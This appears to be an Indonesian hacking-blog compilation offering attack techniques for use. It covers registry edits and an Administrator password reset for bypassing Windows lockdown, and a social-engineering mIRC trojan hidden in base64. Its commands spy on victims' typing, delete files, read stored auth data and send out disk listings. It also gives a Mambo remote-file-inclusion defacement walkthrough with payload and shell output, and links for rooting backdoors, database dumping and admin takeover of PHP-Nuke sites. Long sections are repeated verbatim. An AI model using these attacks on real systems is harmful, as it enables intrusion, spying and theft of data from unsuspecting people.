Jika Windows Key tidak berfungsi
- Disable (Turn off Windows+X hotkeys)
--------------------------------------- GPEdit.msc ---------------------------------------
------------------------------------------- end --------------------------------------------
==> Setelah GPEdit.msc terbuka baru buka Registry Tools
caranya:
C:\Windows\System32\regedit.exe <-- double Click
--- atau ---
C:\Windows\regedit.exe <-- double Click
------------------------------------------ start. ------------------------------------------
--------------------------------------- Regedit. ---------------------------------------
Regedit4
[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD]
"loadvxd"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:00000000
"LinkResolveIgnoreLinkInfo"=dword:00000000
"NoFolderOptions"=dword:00000000
"ClearRecentDocsOnExit"=dword:00000000
"NoTrayContextMenu"=dword:00000000
"EnforceShellExtensionSecurity"=dword:00000000
"NoPrinterTabs"=dword:00000000
"NoDeletePrinter"=dword:00000000
"NoAddPrinter"=dword:00000000
"NoRun"=dword:00000000
"NoSetFolders"=dword:00000000
"NoSetTaskbar"=dword:00000000
"NoClose"=dword:00000000
"NoViewContextMenu"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
"NoDispScrSavPage"=dword:00000000
"NoDispAppearancePage"=dword:00000000
"NoDispSettingsPage"=dword:00000000
"NoAdminPage"=dword:00000000
"NoProfilePage"=dword:00000000
"NoDevMgrPage"=dword:00000000
"NoConfigPage"=dword:0000000
"NoFileSysPage"=dword:00000000
"NoDispCPL"=dword:00000000
"NoDispBackgroundPage"=dword:00000000
"NoVirtMemPage"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]
"NoFileSharingControl"=dword:00000000
"NoPrintSharingControl"=dword:00000000
"NoNetSetup"=dword:00000000
"NoNetSetupIDPage"=dword:00000000
"NoNetSetupSecurityPage"=dword:00000000
"NoEntireNetwork"=dword:00000000
"NoWorkgroupContents"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"NoRealMode"=dword:00000000
"Disable"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoHTMLWallPaper"=dword:00000000
"NoChangingWallPaper"=dword:00000000
"NoCloseDragDropBands"=dword:00000000
"NoMovingBands"=dword:00000000
"NoAddingComponents"=dword:00000000
"NoDeletingComponents"=dword:00000000
"NoEditingComponents"=dword:00000000
"NoClosingComponents"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableCMD"=dword:00000000
"DisableRegistryTools"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced]
"Hidden"=dword:00000000
"HideFileExt"=dword:00000000
"ShowSuperHidden"=dword:00000000
--------------------------------------- Regedit. ---------------------------------------
------------------------------------------- end --------------------------------------------
==> Setelah regedit.exe terbuka baru ubah password administrator <-- (Ini yang di tunggu2x)
caranya:
C:\Windows\System32\compmgmt.msc <-- double Click
------------------------------------------ start. ------------------------------------------
------------------------------------ Administrator. -------------------------------------
Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User
- Klik kanan Administrator -> Set Password
- Ketik New Password: **********
Confirm Password: **********
Selesai deh!!!!!!!!!!!!!
------------------------------------ Administrator. -------------------------------------
------------------------------------------- end --------------------------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
---------------------------------------------------------------------------------------------
Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus - Bonus
--------------------------------------- Bonus - Bonus ---------------------------------------
Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu
caranya:
- Masuk ke Folder misalnya: C:/Windows/System32
- Trus klik salah satu file dalam folder itu
misalnya: TaskMgr.exe
- Kemudian klik menu File pada Win Explorer
- Run as...
- Klik The following user -> Masukkan passwordnya
Username: Administrator
Password: ********
- Selesai
NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah
kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara
lain silakan anda temukan sendiri, selamat mencoba
Contoh lain2nya dibawah ini...........
1. Membuka MSConfig dari Windows Explorer
Caranya:
C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe
2. Membuka Sysedit dari Windows Explorer
Caranya:
C:\Windows\System32\Sysedit.exe
3. Membuka Task Manager
Caranya:
C:\Windows\System32\taskmgr.exe
4. Membuka Services.msc
Caranya:
C:\Windows\System32\services.msc
5. Membuka Disk Management System (Melihat Partisi Harddisk)
Caranya:
C:\Windows\System32\diskmgmt.msc
6. Membuka Computer Management Services
Caranya:
C:\Windows\System32\compmgmt.msc
7. Membuka Shortcut to desktop
Caranya:
C:\Windows\System32\Show Desktop
8. Membuka Defragment
Caranya
C:\Windows\System32\dfrg.msc
Thursday, February 22, 2007
meremote Lawan Chatting
*
Pendahuluan
Dulu di sebuah majalah bernama neotek http://www.neotek.co.id ada sebuah script yang dibahas beberapa kali. Guna script ini adalah melakukan spying pada mIRC orang lain dan melihat apa yang type disana. Script ini begitu terlihat hebat pada saat itu. Tapi ternyata masih kurang efektif, mengingat si penyerang harus secara manual mengetikan script penyadap itu ke dalam remote text mIRC si victim.
Pada kesempatan kali ini, kita akan sedikit bahas yang namanya Trully Remote Access pada mIRC.
Bagaimana cara kerjanya?? Bener bener Remote kah??
Sering gak sih kalian dapat spam bot untuk mengetikan sebuah code tertentu?? Dan biasanya dijanjikan akan dapat men-take over channel orang lain di mIRC? Kalau sering, yah tentunya sudah tahu apa yang harus dilakukan dengan code tersebut .. Hehehe ..
Bagi yang belum pernah tahu. Ada sebuah cara dimana anda akan dapat melakukan "Remote Access" pada komputer orang lain melalui mIRC, dan hanya perlu dilakukan dengan cara membuat si victim percaya untuk mengetikan sebuah code. Code apakah itu??
CODE
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IG hhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg i love you
adalah tempat anda menaruhkan nick yang anda miliki pada sebuah IRC server dimana anda bermain. Anda bisa juga menghilangkan bagian "| msg i love you" untuk membuat si victim tidak mengirimkan kalimat itu disaat pertama dia mengetikan code. Atau apabila anda ingin menggantinya pun, anda bisa melakukan hal itu. Just be creative !!!
Sebenarnya apa sih arti daripada code tersebut??!
Saya juga doeloe waktu pertama kali mainan mIRC gak tau menahu, sebenernya apa sih hal kayak bgituan?? Kenapa sih koq dengan ngetik itu komputer kita isa ke take over sama orang?? Memang itu code artinya apa??
Setelah bertapa lama (Cie ileh makek bertapa), akhirnya saya mengerti bahwa itu adalah Base64 Encoding dan sebenernya arti daripada code diatas itu adalah:CODE
on ^*:text:ins*:?:{ . $+ $2- | haltdef }
Dimana brarti juga bahwa setiap message dari anda kepada victim anda yang dimulai dengan kata "ins" akan di block, sehingga si victim tidak akan tahu command yang anda ketikan kepada dia.
Contoh:
/msg ins msg #sate hi
Dengan menggunakan command diatas anda melakukan perintah kepada victim anda untuk mengetikan kata "hi" di channel yang bernama #sate
Lalu apa yg bisa kita lakukan dengan itu?? Apa hanya demikian??
Weits .. Tidak .. !!! Masih banyak cara lain yang bisa anda lakukan, contohnya adalah melakukan spying pada victim, melihat semua yang dia ketik dan lain sebagainya. Tak percaya?? Ketikanlah code berikut setelah victim ter-injeksi:CODE
/msg victim ins write -c myscript.mrc
/msg victim ins unload -rs myscript.mrc
/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg victim ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }
/msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg victim ins load -rs myscript.mrc
Note: Dimana victim adalah nickname korban anda dan YOURNICK adalah nick anda sendiri dalam IRC Server yang sama
Anda juga dapat berhenti melakukan spying dengan cara mengetikan code ini:
/msg victim ins unload -rs myscript.mrc
Terkadang anda juga ingin melakukan pengintaian hanya setengah2. Maksud saya, misalnya anda ingin melihat apa sih yang dia ketikan di private messages, tapi anda tidak ingin mendapatkan apa yang dia bicarakan di channel, itu bisa diakalin dengan code berikut ini:CODE
/msg victim ins write -c myscript.mrc
/msg victim ins unload -rs myscript.mrc
/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg victim ins write myscript.mrc on *:TEXT:*:?:Question { .msg YOURNICK $timestamp <- < $+ $nick $+ > $1- }
/msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg victim ins load -rs myscript.mrc
Bahkan anda juga bisa menjadikannya semacam BOT anda di mIRC dengan sedikit trick seperti ini:CODE
/msg victim insert write -c testing.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
/msg victim ins .load –rs testing.mrc
Dimana dia akan melakukan pemberian Operator access pada anda (+o) di channel dimana dia OP dan anda mengetikan "!opme" (Tanpa kutip).
Berikut adalah list command yang bisa anda lakukan:
REMOVE FILE :
/msg victim ins remove C:Textfile.txt
OPEN SITE:
/msg victim ins url www.site.com
JOIN CHANNEL:
/msg victim ins join #channel
PART CHANNEL:
/msg victim ins part #channel
QUERY USER:
/msg victim ins query user
MSG USER:
/msg victim ins msg user
INVITE USER:
/msg victim ins invite user #channel
BAN USER:
/msg victim ins ban #channel user
KICK USER:
/msg victim ins kick #channel user
IGNORE USER:
/msg victim ins ignore *!*@host.com
UNIGNORE USER:
/msg victim ins unignore *!*@host.com
CHANGE NICK:
/msg victim ins nick thenickyouwant
OP USER:
/msg victim ins mode #channel +o user
VOICE USER:
/msg victim ins mode #channel +v user
CHANGE TOPIC:
/msg victim ins topic #channel text
RECEIVE FILE:
/msg victim ins dcc send user file
or
/msg victim ins dcc send user C:something.sth
EDIT TEXT:
/msg victim ins write -l1 C:TESTING.txt thetextyouwanttoedit
(-l1 --> first line)
READ A PIECE OF FILE (LIKE PERFORM):
following commands must be executed after eachother:
/msg victim ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }
/msg victim ins .load -rs mab
/msg victim ins abcd123
SEARCH HARD DISK FOR A FILE:
/msg victim ins write MAB1 alias MAB1 { .echo $findfile(C:,porn.*,0,msg user $1-) }
/msg victim ins .load -rs MAB1
/msg victim ins MAB1
LET HIS mIRC CRASH:
/msg victim ins write MAB2 alias MAB2 { while (1 != 2) { beep } }
/msg victim ins .load -rs MAB2
/msg victim ins MAB2
SCAN HIS HARD DISK AND SAVE IT AS .txt:
//echo $findfile(c:,*.*,0,write C:M_A_B.txt $1-)
/msg victim ins dcc send YOURNICK C:M_A_B.txt
/msg victim write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IG hhbHRkZWYgfQ==,m) | .load -rs MyNewScript.mrc
TURN THE AUTO JOIN ON INVITE ON (or OFF)
/msg victim ins ajinvite on
LET THE VICTIM MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
/msg victim ins amsg
CHANGE THE VICTIMs ALTERNATIVE NICK:
/msg victim ins anick
CHANGE THE VICTIMs BACKGROUND PICTURE:
/msg victim ins background [-aemsgdluhcfnrtpx] [window] [filename]
with
-a = active window
-m = main mIRC window
-s = status window
-g = finger window
-d = single message window
-e = set as default
-cfnrtp = center, fill, normal, stretch, tile, photo
-l = toolbar
-u = toolbar buttons
-h = switchbar
-x = no background picture
LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:
/msg victim ins channel #CHANNELNAME
Note: sang korban harus ada pada #CHANNELNAME
CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:
/msg victim ins clearall [-snqmtgu]
s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.
LET THE VICTIM CLIPBOARD A SPECIFIED TEXT:
/msg victim ins clipboard
CLOSE THE OPEN QUERIES OF THE VICTIM:
/msg victim ins close
LET THE VICTIM QUIT mIRC:
/msg victim ins quit
LET THE VICTIM DISCONNECT FROM SERVER:
/msg victim ins disconnect
LET THE VICTIM CHANGE SERVER:
/msg victim ins server the.server.you.want
LET THE VICTIM OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
/msg victim ins server -m
/msg victim ins server the.server.you.want
LET THE VICTIM GIVE YOU FLAGS (if he is able to):
/msg victim ins msg |TheBot| chanlev #channel YOURNICK +flag
Note:
|TheBot| = the bot who can give flags
Chanlev = can be different, sometimes it is also, "adduser"
flag = the flag you want
YOURNICK = your nick
CHANGE THE VICTIMs FONT AND FONT SIZE:
/msg victim ins font -asgbd
CHANGE THE VICTIMs FULL NAME:
/msg victim ins fullname
LET THE VICTIM REJOIN A CHANNEL:
/msg victim ins hop #CHANNEL
MAKE A NEW DIRECTORY ON THE VICITMs HARD DISK:
/msg victim ins mkdir
NOTE:
victim = nick of the victim
user = your nick
Sekian~
Note: Ini juga merupakan sebuah pembuktian bahwa, dengan hanya menggunakan mIRC kita bisa membuat sebuah trojan yang langsung melakukan penyerangan ke komputer lawan. Terbukti dengan access yang kita dapat untuk men-delete dan memanipulasi berbagai hal di komputer sang korban.
Pendahuluan
Dulu di sebuah majalah bernama neotek http://www.neotek.co.id ada sebuah script yang dibahas beberapa kali. Guna script ini adalah melakukan spying pada mIRC orang lain dan melihat apa yang type disana. Script ini begitu terlihat hebat pada saat itu. Tapi ternyata masih kurang efektif, mengingat si penyerang harus secara manual mengetikan script penyadap itu ke dalam remote text mIRC si victim.
Pada kesempatan kali ini, kita akan sedikit bahas yang namanya Trully Remote Access pada mIRC.
Bagaimana cara kerjanya?? Bener bener Remote kah??
Sering gak sih kalian dapat spam bot untuk mengetikan sebuah code tertentu?? Dan biasanya dijanjikan akan dapat men-take over channel orang lain di mIRC? Kalau sering, yah tentunya sudah tahu apa yang harus dilakukan dengan code tersebut .. Hehehe ..
Bagi yang belum pernah tahu. Ada sebuah cara dimana anda akan dapat melakukan "Remote Access" pada komputer orang lain melalui mIRC, dan hanya perlu dilakukan dengan cara membuat si victim percaya untuk mengetikan sebuah code. Code apakah itu??
CODE
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IG hhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg i love you
adalah tempat anda menaruhkan nick yang anda miliki pada sebuah IRC server dimana anda bermain. Anda bisa juga menghilangkan bagian "| msg i love you" untuk membuat si victim tidak mengirimkan kalimat itu disaat pertama dia mengetikan code. Atau apabila anda ingin menggantinya pun, anda bisa melakukan hal itu. Just be creative !!!
Sebenarnya apa sih arti daripada code tersebut??!
Saya juga doeloe waktu pertama kali mainan mIRC gak tau menahu, sebenernya apa sih hal kayak bgituan?? Kenapa sih koq dengan ngetik itu komputer kita isa ke take over sama orang?? Memang itu code artinya apa??
Setelah bertapa lama (Cie ileh makek bertapa), akhirnya saya mengerti bahwa itu adalah Base64 Encoding dan sebenernya arti daripada code diatas itu adalah:CODE
on ^*:text:ins*:?:{ . $+ $2- | haltdef }
Dimana brarti juga bahwa setiap message dari anda kepada victim anda yang dimulai dengan kata "ins" akan di block, sehingga si victim tidak akan tahu command yang anda ketikan kepada dia.
Contoh:
/msg ins msg #sate hi
Dengan menggunakan command diatas anda melakukan perintah kepada victim anda untuk mengetikan kata "hi" di channel yang bernama #sate
Lalu apa yg bisa kita lakukan dengan itu?? Apa hanya demikian??
Weits .. Tidak .. !!! Masih banyak cara lain yang bisa anda lakukan, contohnya adalah melakukan spying pada victim, melihat semua yang dia ketik dan lain sebagainya. Tak percaya?? Ketikanlah code berikut setelah victim ter-injeksi:CODE
/msg victim ins write -c myscript.mrc
/msg victim ins unload -rs myscript.mrc
/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg victim ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }
/msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg victim ins load -rs myscript.mrc
Note: Dimana victim adalah nickname korban anda dan YOURNICK adalah nick anda sendiri dalam IRC Server yang sama
Anda juga dapat berhenti melakukan spying dengan cara mengetikan code ini:
/msg victim ins unload -rs myscript.mrc
Terkadang anda juga ingin melakukan pengintaian hanya setengah2. Maksud saya, misalnya anda ingin melihat apa sih yang dia ketikan di private messages, tapi anda tidak ingin mendapatkan apa yang dia bicarakan di channel, itu bisa diakalin dengan code berikut ini:CODE
/msg victim ins write -c myscript.mrc
/msg victim ins unload -rs myscript.mrc
/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg victim ins write myscript.mrc on *:TEXT:*:?:Question { .msg YOURNICK $timestamp <- < $+ $nick $+ > $1- }
/msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg victim ins load -rs myscript.mrc
Bahkan anda juga bisa menjadikannya semacam BOT anda di mIRC dengan sedikit trick seperti ini:CODE
/msg victim insert write -c testing.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
/msg victim ins .load –rs testing.mrc
Dimana dia akan melakukan pemberian Operator access pada anda (+o) di channel dimana dia OP dan anda mengetikan "!opme" (Tanpa kutip).
Berikut adalah list command yang bisa anda lakukan:
REMOVE FILE :
/msg victim ins remove C:Textfile.txt
OPEN SITE:
/msg victim ins url www.site.com
JOIN CHANNEL:
/msg victim ins join #channel
PART CHANNEL:
/msg victim ins part #channel
QUERY USER:
/msg victim ins query user
MSG USER:
/msg victim ins msg user
INVITE USER:
/msg victim ins invite user #channel
BAN USER:
/msg victim ins ban #channel user
KICK USER:
/msg victim ins kick #channel user
IGNORE USER:
/msg victim ins ignore *!*@host.com
UNIGNORE USER:
/msg victim ins unignore *!*@host.com
CHANGE NICK:
/msg victim ins nick thenickyouwant
OP USER:
/msg victim ins mode #channel +o user
VOICE USER:
/msg victim ins mode #channel +v user
CHANGE TOPIC:
/msg victim ins topic #channel text
RECEIVE FILE:
/msg victim ins dcc send user file
or
/msg victim ins dcc send user C:something.sth
EDIT TEXT:
/msg victim ins write -l1 C:TESTING.txt thetextyouwanttoedit
(-l1 --> first line)
READ A PIECE OF FILE (LIKE PERFORM):
following commands must be executed after eachother:
/msg victim ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }
/msg victim ins .load -rs mab
/msg victim ins abcd123
SEARCH HARD DISK FOR A FILE:
/msg victim ins write MAB1 alias MAB1 { .echo $findfile(C:,porn.*,0,msg user $1-) }
/msg victim ins .load -rs MAB1
/msg victim ins MAB1
LET HIS mIRC CRASH:
/msg victim ins write MAB2 alias MAB2 { while (1 != 2) { beep } }
/msg victim ins .load -rs MAB2
/msg victim ins MAB2
SCAN HIS HARD DISK AND SAVE IT AS .txt:
//echo $findfile(c:,*.*,0,write C:M_A_B.txt $1-)
/msg victim ins dcc send YOURNICK C:M_A_B.txt
/msg victim write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IG hhbHRkZWYgfQ==,m) | .load -rs MyNewScript.mrc
TURN THE AUTO JOIN ON INVITE ON (or OFF)
/msg victim ins ajinvite on
LET THE VICTIM MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
/msg victim ins amsg
CHANGE THE VICTIMs ALTERNATIVE NICK:
/msg victim ins anick
CHANGE THE VICTIMs BACKGROUND PICTURE:
/msg victim ins background [-aemsgdluhcfnrtpx] [window] [filename]
with
-a = active window
-m = main mIRC window
-s = status window
-g = finger window
-d = single message window
-e = set as default
-cfnrtp = center, fill, normal, stretch, tile, photo
-l = toolbar
-u = toolbar buttons
-h = switchbar
-x = no background picture
LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:
/msg victim ins channel #CHANNELNAME
Note: sang korban harus ada pada #CHANNELNAME
CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:
/msg victim ins clearall [-snqmtgu]
s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.
LET THE VICTIM CLIPBOARD A SPECIFIED TEXT:
/msg victim ins clipboard
CLOSE THE OPEN QUERIES OF THE VICTIM:
/msg victim ins close
LET THE VICTIM QUIT mIRC:
/msg victim ins quit
LET THE VICTIM DISCONNECT FROM SERVER:
/msg victim ins disconnect
LET THE VICTIM CHANGE SERVER:
/msg victim ins server the.server.you.want
LET THE VICTIM OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
/msg victim ins server -m
/msg victim ins server the.server.you.want
LET THE VICTIM GIVE YOU FLAGS (if he is able to):
/msg victim ins msg |TheBot| chanlev #channel YOURNICK +flag
Note:
|TheBot| = the bot who can give flags
Chanlev = can be different, sometimes it is also, "adduser"
flag = the flag you want
YOURNICK = your nick
CHANGE THE VICTIMs FONT AND FONT SIZE:
/msg victim ins font -asgbd
CHANGE THE VICTIMs FULL NAME:
/msg victim ins fullname
LET THE VICTIM REJOIN A CHANNEL:
/msg victim ins hop #CHANNEL
MAKE A NEW DIRECTORY ON THE VICITMs HARD DISK:
/msg victim ins mkdir
NOTE:
victim = nick of the victim
user = your nick
Sekian~
Note: Ini juga merupakan sebuah pembuktian bahwa, dengan hanya menggunakan mIRC kita bisa membuat sebuah trojan yang langsung melakukan penyerangan ke komputer lawan. Terbukti dengan access yang kita dapat untuk men-delete dan memanipulasi berbagai hal di komputer sang korban.
Web Hacking Deface
ok, pada saat mendeface web sang attacker haruslah ngengetahui terlebih dahulu dari system web tersebut, misalkan web tersebut dibangun dengan memakai source A,atau package B atau laen - lain,lalu bagai manakah saya bisa memperoleh informasi tersebut?, sangat banyak cara dan variasi yang dapat anda gunakan untuk mendapatkan informasi tentang web server target, misal seperti meliat file robots.txt, meliat sourcecode *.css, url, atau laen laen,...
Ok Untuk contoh victim saya sudah mendapatkan sc dari file css sebagai berikut:
/**
* @version $Id: install.css,v 1.2 2005/11/12 06:06:51 cauld Exp $
* @package Mambo
* @copyright (C) 2000 - 2005 Miro International Pty Ltd
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* Mambo is Free Software
*/
body {
margin: 0px;
padding: 0px;
color : #333;
background-color : #FFF;
font-size : 11px;
font-family : Arial, Helvetica, sans-serif;
}
.
.
.
. bla-bla-bla,....
ping-pong,... kita sudah dapat meliat dari web tersebut dibangun memakai mambo php vendor:http://mamboforge.net/projects/mambo untuk tahap selanjutnya download source code tersebut, teliti source, dan cari bug nya,ok misal aja dalam sc administrator kita dah dapat bug nya:
/**
* @version $Id: index3.php,v 1.4 2005/11/21 11:57:50 csouza Exp $
* @package Mambo
* @copyright (C) 2000 - 2005 Miro International Pty Ltd
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* Mambo is Free Software
*/
/** Set flag that this is a parent file */
define( "_VALID_MOS", 1 );if (!file_exists( "../configuration.php" )) {
header( "Location: ../installation/index.php" );
exit();
}require_once( "../globals.php" );
require_once( "../configuration.php" );
require_once( $mosConfig_absolute_path . "/includes/mambo.php" );
include_once( $mosConfig_absolute_path . "/language/".$mosConfig_lang.".php" );
require_once( $mosConfig_absolute_path . "/administrator/includes/admin.php" );
huehuehuehue,.. url input tanpa filter require_once( $mosConfig_absolute_path . "/administrator/includes/admin.php" ); jadi?, ya gt dech,.... langsung aja luncurkan roket kita, jadi nya gini :
http://victim/administrator/index3.php?mosConfig_absolute_path=[Evil Script]
hehehehe,... mosConfig_absolute_path adalah nama variable dari absolute part
lalu liat apakah id yang punya web sama dengan si user(kamu sendiri)
cmd:$id;ls -lia
uid=501(victim) gid=501(victim) groups=501(victim)
total 32
267965 drwxr-xr-x 3 victim victim 4096 Des 31 23:13 .
245761 drwxr-xr-x 4 root root 4096 Des 31 23:13 ..
267968 -rw-r--r-- 1 victim victim 24 Des 31 23:13 index.php
267969 -rw-r--r-- 1 victim victim 191 Des 31 23:13 index2.php
267970 -rw-r--r-- 1 victim victim 191 Des 31 23:13 login.php
267971 -rw-r--r-- 1 victim victim 124 Des 31 23:13 index3.php
267972 drwxr-xr-x 1 victim victim 141 Des 31 23:13 backups
267973 -rw-r--r-- 1 victim victim 3722 Des 31 23:13 components
267974 drwxr-xr-x 2 victim victim 4096 Des 31 23:13 images
267975 drwxr-xr-x 2 victim victim 4096 Des 31 23:13 includes
nah keberuntungan di tangan mu,...dan hanya dengan beberapa command web akan terdeface
Ok Untuk contoh victim saya sudah mendapatkan sc dari file css sebagai berikut:
/**
* @version $Id: install.css,v 1.2 2005/11/12 06:06:51 cauld Exp $
* @package Mambo
* @copyright (C) 2000 - 2005 Miro International Pty Ltd
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* Mambo is Free Software
*/
body {
margin: 0px;
padding: 0px;
color : #333;
background-color : #FFF;
font-size : 11px;
font-family : Arial, Helvetica, sans-serif;
}
.
.
.
. bla-bla-bla,....
ping-pong,... kita sudah dapat meliat dari web tersebut dibangun memakai mambo php vendor:http://mamboforge.net/projects/mambo untuk tahap selanjutnya download source code tersebut, teliti source, dan cari bug nya,ok misal aja dalam sc administrator kita dah dapat bug nya:
/**
* @version $Id: index3.php,v 1.4 2005/11/21 11:57:50 csouza Exp $
* @package Mambo
* @copyright (C) 2000 - 2005 Miro International Pty Ltd
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* Mambo is Free Software
*/
/** Set flag that this is a parent file */
define( "_VALID_MOS", 1 );if (!file_exists( "../configuration.php" )) {
header( "Location: ../installation/index.php" );
exit();
}require_once( "../globals.php" );
require_once( "../configuration.php" );
require_once( $mosConfig_absolute_path . "/includes/mambo.php" );
include_once( $mosConfig_absolute_path . "/language/".$mosConfig_lang.".php" );
require_once( $mosConfig_absolute_path . "/administrator/includes/admin.php" );
huehuehuehue,.. url input tanpa filter require_once( $mosConfig_absolute_path . "/administrator/includes/admin.php" ); jadi?, ya gt dech,.... langsung aja luncurkan roket kita, jadi nya gini :
http://victim/administrator/index3.php?mosConfig_absolute_path=[Evil Script]
hehehehe,... mosConfig_absolute_path adalah nama variable dari absolute part
lalu liat apakah id yang punya web sama dengan si user(kamu sendiri)
cmd:$id;ls -lia
uid=501(victim) gid=501(victim) groups=501(victim)
total 32
267965 drwxr-xr-x 3 victim victim 4096 Des 31 23:13 .
245761 drwxr-xr-x 4 root root 4096 Des 31 23:13 ..
267968 -rw-r--r-- 1 victim victim 24 Des 31 23:13 index.php
267969 -rw-r--r-- 1 victim victim 191 Des 31 23:13 index2.php
267970 -rw-r--r-- 1 victim victim 191 Des 31 23:13 login.php
267971 -rw-r--r-- 1 victim victim 124 Des 31 23:13 index3.php
267972 drwxr-xr-x 1 victim victim 141 Des 31 23:13 backups
267973 -rw-r--r-- 1 victim victim 3722 Des 31 23:13 components
267974 drwxr-xr-x 2 victim victim 4096 Des 31 23:13 images
267975 drwxr-xr-x 2 victim victim 4096 Des 31 23:13 includes
nah keberuntungan di tangan mu,...dan hanya dengan beberapa command web akan terdeface
Video Hacking
Bind? ngeroot [ h4ntu ]
bind adalah salah satu backdoor u/ rooting. di video ini di tunjukkan bagaimana mudahnya take over root :) tapi gak semua bisa loh... liat spec target u/ bind di inet. kayaknya hanya kernel-kernel tertentu saja yang mempan dibind. nah ini source bind-nyaDownload disini
List-mail [ h4ntu ]
Kali ini kita coba nyari daftar email di web dengan cara ngintip database. pertama cari dulu file config yang isinya data-data buat login ke database. abis itu kita bisa mulai ngintip. db_browsernya ini neh..| Download Now |
Ngadmin di nuke site [ h4ntu ]
Yang kita perlu adalah masuk ke server target, tentu nya ini berlaku buat target yang make nuke (PHPnuke). selanjutnya, yang kita perlukan adalah sedikit ilmu tentang SQL, coz kita akan maen query di sini. baca config.php > dapatkan uname, psw dan namadb-nya trus
update dah psw adminnya :p cari target yang pake nuke ya dengan vulnya nuke.
| Download Now |
Patch bug di php [ h4ntu ]
Sebagai newbie :) sebaiknya kita gak cuma nyari vuln atawa kelemahan sistem aja. Tapi juga tahu gmn cara buat nambal kelemahan yang ada. Nah di video ini ada satu contoh, yi cara nambal bug php. see the show! eh ini contoh tambalan yang ada di vid
if (isset($_GET[bd])){include($bd);}
if (eregi("http", $da_path)){exit;}
| Download Now |
Patch php.ini [ h4ntu ]
Safe_mode = off? wah ini ternyata rada bahaya, soalnya command shell bisa di eksekusi. nah gimana nambalnya mari kita lihat caranya :p
| Download Now |
Buat proxy sendiri di server target [ h4ntu ]
siapin xpl ini ... http://iahc.net/log/xpl/proxy.tgz abis itu kita bisa nggunain itu tool u/ buat proxy. lumayan gratisan.
| Download Now |
proxy sock part2 [ h4ntu ]
masih sama soal proxy sock, bisa buat IE. liat aja, http://iahc.net/log/xpl/sock.tgz
| Download Now |
Matdhule ngeroot pake ptrace-kmod
[Sumber : di donlot ma [fx.camagenta.web.id]]
[Sumber : di donlot ma [fx.camagenta.web.id]]
